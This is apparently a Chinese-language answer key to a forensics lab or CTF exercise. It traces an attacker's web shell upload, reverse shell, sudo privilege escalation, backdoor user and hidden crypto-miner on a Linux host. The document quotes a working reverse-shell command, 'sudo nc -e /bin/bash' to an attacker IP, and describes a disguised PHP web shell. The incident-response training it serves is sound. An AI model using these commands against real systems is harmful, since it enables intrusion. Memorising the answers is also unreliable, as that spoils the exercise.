PS:杰克創建在流量包(result.pcap)在根目錄下，請根據已有信息進行分析

1、攻擊者使用的端口掃描工具是?

2、通過流量及日志審計，攻擊者上傳shell的時訪問web使用IP地址是多少?

3、審計流量日志，攻擊者反彈shell的地址及端口?

4、攻擊者使用的提權方式及工具是什么?

5、攻擊者創建的新用戶名是?

6、攻擊者將shell刪除并放到了其他web目錄，文件名被改變了，找出它的絕對路徑及文件名

7、攻擊者使用新用戶留下了木馬進行不法行為，找出程序名,給出程序的絕對路徑

---

用戶名及密碼：security/P@ssw0rd，將/result.pcap文件下載下來：

---

1、攻擊者使用的端口掃描工具是?

過濾出http協議，看到User-Agent值出現了nmap關鍵詞：

答案：nmap

---

2、通過流量及日志審計，攻擊者上傳shell的時訪問web使用IP地址是多少?

Ctrl F搜索關鍵詞“upload”，看到上傳了admin.jpg并用“cmd”傳參來執行system()函數執行命令which nc：

答案：192.168.150.1

---

3、審計流量日志，攻擊者反彈shell的地址及端口?

繼續Ctrl F搜索關鍵詞“admin.jpg”，不斷查找，發現反彈shell信息：

答案：192.168.150.2:4444

---

4、攻擊者使用的提權方式及工具是什么?

執行命令journalctl _COMM=sudo > sudo.txt，使用systemd的系統查看sudo命令的歷史，保存為sudo.txt文件：

打開搜索關鍵詞“192.168.150.2”發現都有8888端口和nc命令：

答案：sudo nc -e /bin/bash 192.168.150.2 8888

---

5、攻擊者創建的新用戶名是?

打開虛擬機就能發現有別的用戶“securityy”：

也可以通過命令“cat /etc/passwd”列出系統上的所有用戶賬號：

一樣能看出有個securityy用戶

答案：securityy

---

6、攻擊者將shell刪除并放到了其他web目錄，文件名被改變了，找出它的絕對路徑及文件名

繼續在sudo.txt中查找關鍵詞“mv”，發現securityy用戶在/var/www/blog目錄下創建了.ShEllHAha目錄，并且將原本的shell從../html/uploads/admin.jpg移動到./.ShEllHAha/.hackba.php

答案：/var/www/blog/.ShEllHAha/.hackba.php

---

7、攻擊者使用新用戶留下了木馬進行不法行為，找出程序名,給出程序的絕對路徑

在第六問中，往下看剛好能看到有個Wakuang.sh（諧音挖礦）關鍵詞，發現securityy用戶在/opt目錄下創建了.Qwert目錄并創建了.Wakuang.sh文件：

答案：/opt/.Qwert/.Wakuang.sh